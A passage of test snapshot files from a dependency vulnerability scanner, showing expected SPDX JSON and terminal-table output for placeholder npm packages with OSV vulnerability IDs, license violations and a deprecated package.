"SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.10.2-rc", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.10.2-rc" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "5.9.0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@5.9.0" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- ================================================ FILE: internal/output/__snapshots__/table_test.snap ================================================ [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬────────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼────────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ │ Apache-2.0 │ npm │ mine2 │ 3.2.5 │ path/to/my/second/lockfile │ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬───────────────┬─────────┬────────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼───────────────┼─────────┼────────────────────────────┤ │ MIT │ Packagist │ author1/mine1 │ 1.2.3 │ path/to/my/first/lockfile │ │ Apache-2.0 │ npm │ mine2 │ 3.2.5 │ path/to/my/second/lockfile │ │ MIT │ Packagist │ author1/mine1 │ 1.2.3 │ path/to/my/third/lockfile │ ╰───────────────────┴───────────┴───────────────┴─────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬────────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼────────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ │ Apache-2.0 │ npm │ mine2 │ 3.2.5 │ path/to/my/second/lockfile │ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT, Apache-2.0 │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ 3.2.5 │ -- │ path/to/my/second/lockfile │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼────────────────────────────┤ │ Uncalled vulnerabilities │ │ │ │ │ │ │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-1 │ 7.8 │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/third/lockfile │ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴────────────────────────────╯ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ │ MIT │ npm │ mine1 │ 1.3.5 │ path/to/my/third/lockfile │ │ Apache-2.0 │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ 3.2.5 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/third/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴────────────────────────────╯ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ │ MIT │ npm │ mine1 │ 1.3.5 │ path/to/my/third/lockfile │ │ Apache-2.0 │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/third/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴────────────────────────────╯ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ │ MIT │ npm │ mine1 │ 1.3.5 │ path/to/my/third/lockfile │ │ Apache-2.0 │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithMixedIssues/one_source_with_one_deprecated_package - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. Total 1 package deprecated. ╭─────────────────────────────────────────────────────────╮ │ Deprecated packages │ ├───────────┬────────────────┬─────────┬──────────────────┤ │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────┼────────────────┼─────────┼──────────────────┤ │ npm │ deprecated-pkg │ 1.0.0 │ path/to/lockfile │ ╰───────────┴────────────────┴─────────┴──────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ Uncalled vulnerabilities │ │ │ │ │ │ │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ 